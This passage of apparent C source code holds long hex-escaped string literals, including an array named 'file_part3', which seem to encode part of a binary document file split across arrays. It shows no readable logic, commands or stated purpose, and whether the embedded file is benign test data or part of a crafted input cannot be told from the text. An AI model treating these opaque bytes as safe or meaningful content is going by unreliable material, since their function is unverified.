+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00" +"\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01\x00\x0f\x84\x65\x01\x11" +"\x84\x9b\xfe\x12\x64\x68\x01\x01\x00\x5e\x84\x65\x01\x60\x84\x9b" +"\xfe\x61\x24\x03\x00\x07\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01" +"\x00\x61\x24\x01\x00\x07\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00" +"\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x03\x12\x64\x68\x01\x01" +"\x00\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x16" +"\x7f\x1b\x00\x00\x91\x1b\x00\x00\x10\x1c\x00\x00\x11\x1c\x00\x00" +"\x15\x1c\x00\x00\x5d\x1d\x00\x00\x5e\x1d\x00\x00\x68\x1d\x00\x00" +"\x20\x1e\x00\x00\x01\x1f\x00\x00\x62\x1f\x00\x00\x5e\x20\x00\x00" +"\x5f\x20\x00\x00\xa1\x20\x00\x00\x4e\x21\x00\x00\x71\x23\x00\x00" +"\xd9\x23\x00\x00\x63\x24\x00\x00\x0d\x26\x00\x00\x3b\x26\x00\x00" +"\x0d\x28\x00\x00\xde\x28\x00\x00\x57\x29\x00\x00\xbc\x29\x00\x00" +"\x7b\x2a\x00\x00\x40\x2b\x00\x00\xeb\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x03\x24\x03\x12\x64\x68" +"\x01\x01\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x03\x12\x64\x38" +"\xff\x00\x00\x61\x24\x03\x00\x13\x00\x00\x03\x24\x01\x0d\xc6\x05" +"\x00\x01\x68\x01\x00\x0f\x84\x65\x01\x11\x84\x9b\xfe\x12\x64\x68" +"\x01\x01\x00\x5e\x84\x65\x01\x60\x84\x9b\xfe\x61\x24\x01\x00\x19" +"\x40\x2b\x00\x00\x41\x2b\x00\x00\x69\x2b\x00\x00\x87\x2b\x00\x00" +"\x88\x2b\x00\x00\x9c\x2b\x00\x00\x13\x2c\x00\x00\x41\x2c\x00\x00" +"\x42\x2c\x00\x00\x5a\x2c\x00\x00\x20\x2d\x00\x00\x65\x2d\x00\x00" +"\x82\x2d\x00\x00\x30\x2e\x00\x00\x54\x2e\x00\x00\x15\x2f\x00\x00" +"\x60\x2f\x00\x00\xf0\x2f\x00\x00\x90\x30\x00\x00\x47\x31\x00\x00" +"\x48\x31\x00\x00\x33\x32\x00\x00\x34\x32\x00\x00\x30\x33\x00\x00" +"\x23\x34\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x03\x24\x01\x0d\xc6\x05" +"\x00\x01\x68\x01\x00\x0f\x84\x65\x01\x11\x84\x9b\xfe\x12\x64\x68" +"\x01\x01\x00\x5e\x84\x65\x01\x60\x84\x9b\x26\x61\x24\x01\x00\x07" +"\x00\x00\x03\x24\x01\x12\x64\x10\xff\x00\x00\x61\x24\x01\x00\x07" +"\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01\x00\x07" +"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x18" +"\x23\x34\x00\x00\x24\x34\x00\x00\xae\x34\x00\x00\xc8\x34\x00\x00" +"\xc9\x34\x00\x00\x33\x35\x00\x00\x34\x35\x00\x00\xee\x36\x00\x00" +"\x4f\x38\x00\x00\x9c\x38\x00\x00\xe3\x38\x00\x00\x62\x39\x00\x00" +"\x63\x39\x00\x00\x29\x3a\x00\x00\xda\x3b\x00\x00\xdb\x3b\x00\x00" +"\xe7\x3b\x00\x00\x76\x3c\x00\x00\x77\x3c\x00\x00\x86\x3c\x00\x00" 
+"\x97\x3d\x00\x00\x19\x3e\x00\x00\xca\x3e\x00\x00\xe4\x3f\x00\x00" +"\x06\x40\x00\x00\x07\x40\x00\x00\x08\x40\x00\x00\x09\x40\x00\x00" +"\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07" +"\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01\x00\x07" +"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x1b" +"\x09\x40\x00\x00\x0a\x40\x00\x00\x19\x40\x00\x00\x1a\x40\x00\x00" +"\x2a\x41\x00\x00\x6b\x41\x00\x00\x6c\x41\x00\x00\x74\x41\x00\x00" 
+"\x75\x41\x00\x00\x81\x41\x00\x00\xe5\x41\x00\x00\xe6\x41\x00\x00" +"\xf0\x41\x00\x00\x1c\x42\x00\x00\x4a\x42\x00\x00\x4b\x42\x00\x00" +"\x67\x42\x00\x00\xa0\x42\x00\x00\xa1\x42\x00\x00\xac\x42\x00\x00" +"\x51\x43\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xe7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xd6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xc9\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb3\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05" +"\x00\x01\x68\x01\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68" +"\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61" +"\x24\x03\x00\x0c\x00\x00\x03\x24\x03\x0f\x84\x68\x01\x11\x84\x98" +"\xfe\x5e\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x10\x00\x00" +"\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01\x00\x0f\x84\x65\x01\x11" +"\x84\x9b\xfe\x5e\x84\x65\x01\x60\x84\x9b\xfe\x61\x24\x03\x00\x07" +"\x00\x00\x03\x24\x01\x12\x64\x10\x0b\x00\x00\x61\x24\x01\x00\x07" +"\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01\x00\x07" 
+"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x14" +"\x51\x43\x00\x00\x52\x43\x00\x00\x76\x43\x00\x00\xe2\x43\x00\x00" +"\xe3\x43\x00\x00\xf6\x43\x00\x00\xc7\x44\x00\x00\xc8\x44\x00\x00" +"\xe0\x44\x00\x00\x66\x45\x00\x00\x67\x45\x00\x00\x76\x45\x00\x00" +"\x46\x46\x00\x00\x98\x46\x00\x00\xbb\x46\x00\x00\x9a\x47\x00\x00" +"\x9b\x47\x00\x00\xa4\x47\x00\x00\xc7\x47\x00\x00\xe7\x47\x00\x00" +"\x4b\x49\x00\x00\x4c\x49\x00\x00\x62\x49\x00\x00\x6a\x4a\x00\x00" +"\x06\x4b\x00\x00\xaf\x4b\x00\x00\x21\x4c\x00\x00\xef\x4c\x00\x00" +"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01" +"\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98" +"\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x1b" +"\xa4\x47\x00\x00\x4c\x49\x00\x00\x62\x49\x00\x00\xf0\x4c\x00\x00" +"\x17\x4d\x00\x00\x18\x4d\x00\x00\x29\x4d\x00\x00\xfe\x4e\x00\x00" +"\x0c\x4f\x00\x00\xe4\x4f\x00\x00\xee\x4f\x00\x00\xd7\x50\x00\x00" +"\xe4\x50\x00\x00\x3e\x52\x00\x00\x4f\x52\x00\x00\x87\x53\x00\x00" +"\x98\x53\x00\x00\x55\x54\x00\x00\x5d\x54\x00\x00\xf7\x55\x00\x00" +"\x0f\x56\x00\x00\x1a\x57\x00\x00\x32\x57\x00\x00\x04\x58\x00\x00" +"\x24\x58\x00\x00\x2a\x58\x00\x00\x2b\x58\x00\x00\x41\x58\x00\x00" +"\x42\x58\x00\x00\x4f\x58\x00\x00\x5c\x58\x00\x00\x6e\x58\x00\x00" +"\x6f\x58\x00\x00\x7d\x58\x00\x00\x8c\x58\x00\x00\xca\x58\x00\x00" +"\xdd\x58\x00\x00\xde\x58\x00\x00\xe0\x58\x00\x00\xe9\x58\x00\x00" +"\xee\x58\x00\x00\xf0\x58\x00\x00\xfb\x58\x00\x00\xfd\x58\x00\x00" +"\xff\x58\x00\x00\x05\x59\x00\x00\x1b\x59\x00\x00\x27\x59\x00\x00" +"\x3a\x59\x00\x00\x4f\x59\x00\x00\x50\x59\x00\x00\x5e\x59\x00\x00" +"\x75\x59\x00\x00\x76\x59\x00\x00\x77\x59\x00\x00\x86\x59\x00\x00" +"\x9e\x59\x00\x00\xa9\x59\x00\x00\x00\x5a\x00\x00\x07\x5a\x00\x00" +"\x52\x5a\x00\x00\x59\x5a\x00\x00\x9b\x5a\x00\x00\xa2\x5a\x00\x00" +"\xa3\x5a\x00\x00\xfd\x5a\x00\x00\x05\x5b\x00\x00\x06\x5b\x00\x00" +"\xac\x5b\x00\x00\xb3\x5b\x00\x00\xb4\x5b\x00\x00\xfc\xf5\xfc\xec" +"\xe5\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5" +"\xfc\xf5\xfc\xe1\xfc\xe1\xfc\xe1\xdc\xfc\xd7\xd2\xdc\xfc\xd7\xcd" +"\xc5\xd2\xc1\xd2\xe1\xdc\xd7\xfc\xbd\xd7\xfc\xd7\xb8\xfc\xc1\xb1" +"\xc1\xe1\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xdc\xfc\xf5\xdc\xfc" +"\xf5\xdc\x0c\x16\x68\xa5\x49\x73\x00\x36\x08\x81\x5d\x08\x81\x00" +"\x09\x16\x68\xa5\x49\x73\x00\x36\x08\x81\x06\x16\x68\x2e\x20\xb9" +"\x00\x00\x06\x16\x68\xa5\x49\x73\x00\x00\x0f\x15\x68\xae\x0f\x6a" 
+"\x00\x16\x68\xae\x0f\x6a\x00\x35\x08\x81\x09\x16\x68\xae\x0f\x6a" +"\x00\x35\x08\x81\x09\x16\x68\xae\x0f\x6a\x00\x36\x08\x81\x09\x16" +"\x68\x45\x6d\x47\x00\x36\x08\x81\x09\x16\x68\x45\x6d\x47\x00\x35" +"\x08\x81\x06\x16\x68\xae\x0f\x6a\x00\x00\x0c\x16\x68\x45\x6d\x47" +"\x00\x35\x08\xe9\x3e\x2a\x01\x00\x10\x16\x68\x45\x6d\x47\x00\x35" +"\x08\x81\x3e\x2a\x01\x43\x4a\x1c\x00\x00\x0d\x16\x68\x45\x6d\x47" +"\x00\x35\x08\x81\x43\x4a\x18\x00\x06\x16\x68\x45\x6d\x47\x00\x46" +"\xef\x4c\x00\x00\xf0\x4c\x00\x00\x17\x4d\x00\x00\x18\x4d\x00\x00" +"\x29\x4d\x00\x00\x26\x4e\x00\x00\xfd\x4e\x00\x00\xfe\x4e\x00\x00" +"\x0c\x4f\x00\x00\x6f\x4f\x00\x00\xe3\x4f\x00\x00\xe4\x4f\x00\x00" +"\xee\x4f\x00\x00\xd6\x50\x00\x00\xd7\x50\x00\x00\xe4\x50\x00\x00" +"\x3d\x52\x00\x00\x3e\x52\x00\x00\x4f\x52\x00\x00\x86\x53\x00\x00" +"\x87\x53\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xb4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xb4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d" +"\xc6\x05\x00\x01\x68\x01\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e" +"\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24" +"\x03\x61\x24\x03\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01" +"\x68\x01\x00\x0f\x84\x65\x01\x11\x84\x9b\xfe\x5e\x84\x65\x01\x60" +"\x84\x9b\xfe\x61\x24\x03\x00\x13\x00\x00\x03\x24\x03\x0d\xc6\x05" +"\x00\x01\x68\x01\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x12\x64\x10" +"\xff\x00\x00\x5e\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x07" +"\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01\x00\x07" +"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x14" +; +char file_part3[]= +"\x87\x53\x00\x00\x98\x53\x00\x00\x54\x54\x00\x00\x55\x54\x00\x00" +"\x5d\x54\x00\x00\xf6\x55\x00\x00\xf7\x55\x00\x00\x0f\x56\x00\x00" +"\x19\x57\x00\x00\x1a\x57\x00\x00\x31\x57\x00\x00\x32\x57\x00\x00" +"\x41\x58\x00\x00\x42\x58\x00\x00\x4f\x58\x00\x00\x6e\x58\x00\x00" +"\x6f\x58\x00\x00\x7d\x58\x00\x00\xca\x58\x00\x00\xde\x58\x00\x00" +"\xef\x58\x00\x00\xf0\x58\x00\x00\xfb\x58\x00\x00\xee\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xee\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x07\x00\x00\x03\x24\x03\x61\x24\x03\x67\x64\xa5\x49\x73\x00" +"\x00\x07\x00\x00\x03\x24\x03\x61\x24\x03\x67\x64\xae\x0f\x6a\x00" +"\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\xf8\x01\x00\x0f" +"\x84\xf8\x01\x11\x84\x08\xfe\x5e\x84\xf8\x01\x60\x84\x08\xfe\x61" +"\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x10\x00\x00" +"\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01\x00\x0f\x84\x68\x01\x11" +"\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x16" +"\xfb\x58\x00\x00\x1b\x59\x00\x00\x50\x59\x00\x00\x77\x59\x00\x00" +"\x86\x59\x00\x00\x9d\x59\x00\x00\x9e\x59\x00\x00\xa9\x59\x00\x00" +"\xdc\x59\x00\x00\xff\x59\x00\x00\x00\x5a\x00\x00\x07\x5a\x00\x00" +"\x51\x5a\x00\x00\x52\x5a\x00\x00\x59\x5a\x00\x00\x9a\x5a\x00\x00" +"\x9b\x5a\x00\x00\xa3\x5a\x00\x00\xd4\x5a\x00\x00\xfc\x5a\x00\x00" +"\xfd\x5a\x00\x00\x06\x5b\x00\x00\x42\x5b\x00\x00\xab\x5b\x00\x00" +"\xac\x5b\x00\x00\xb4\x5b\x00\x00\xe7\x5b\x00\x00\xf7\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xe1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe1\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe1\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00" 
